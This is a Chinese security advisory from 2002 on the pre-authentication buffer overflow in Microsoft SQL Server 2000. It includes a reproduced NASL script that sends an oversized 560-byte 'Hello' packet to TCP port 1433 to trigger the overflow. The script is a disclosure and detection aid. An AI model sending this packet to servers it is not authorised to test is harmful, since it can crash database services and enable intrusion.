首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第34期->最新漏洞
日期:2002-08-16
发布日期:2002-08-06
更新日期:2002-08-07
受影响系统:
Microsoft SQL Server 2000
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Microsoft SQL Server 2000 SP1
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Microsoft SQL Server 2000 SP2
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
描述:
----------------------------------------------------------------------
BUGTRAQ ID: 5411
Microsoft SQL Server是一款由Microsoft开发的大型数据库系统。
Microsoft SQL Server在预验证处理时存在漏洞,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
Microsoft SQL Server的预验证过程存在问题,远程攻击者通过连接TCP 1433端口可以进行缓冲区溢出攻击,由于问题发生在验证之前,所以攻击这无需验证就可以进行攻击,可能使攻击者以SQL进程权限在系统上执行任意指令。
目前未知哪个SQL Server版本存在漏洞。
<*来源:Dave Aitel (daitel@atstake.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=102873609025020&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=102865925419469&w=2
*>
测试方法:
----------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Dave Aitel (daitel@atstake.com)提供了如下NASL脚本测试程序:
##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
#TODO:
#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
if(description)
{
script_id(11067);
# script_cve_id("CVE-2000-0402");
script_version ("$Revision: 0.1 $");
name["english"] = "Microsoft SQL Server Hello Overflow";
script_name(english:name["english"]);
desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.
An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.
Solution : disable this service (Microsoft SQL Server).
Risk factor : High";
script_description(english:desc["english"]);
summary["english"] = "Microsoft SQL Server Hello Overflow";
script_summary(english:summary["english"]);
script_category(ACT_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
family["english"] = "Windows";
script_family(english:family["english"]);
script_require_ports(1433);
exit(0);
}
#
# The script code starts here
#
#taken from mssql.spk
pkt_hdr = raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03 ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);
#taken from mssql.spk
pkt_tail = raw_string (
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);
#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
port = 1433;
found = 0;
report = "The SQL Server is vulnerable to the Hello overflow.
An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.
Solution : disable this service (Microsoft SQL Server).
Risk factor : High";
if(get_port_state(port))
{
soc = open_sock_tcp(port);
if(soc)
{
#uncomment this to see what normally happens
#attack_string="MSSQLServer";
#uncomment next line to actually test for overflow
attack_string=crap(560);
# this creates a variable called sql_packet
sql_packet = pkt_hdr+attack_string+pkt_tail;
send(socket:soc, data:sql_packet);
r = recv(socket:soc, length:4096);
close(soc);
display ("Result:",r,"\n");
if(!r)
{
display("Security Hole in MSSQL\n");
security_hole(port:port, data:report);
}
}
}
建议:
----------------------------------------------------------------------
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/
版权所有,未经许可,不得转载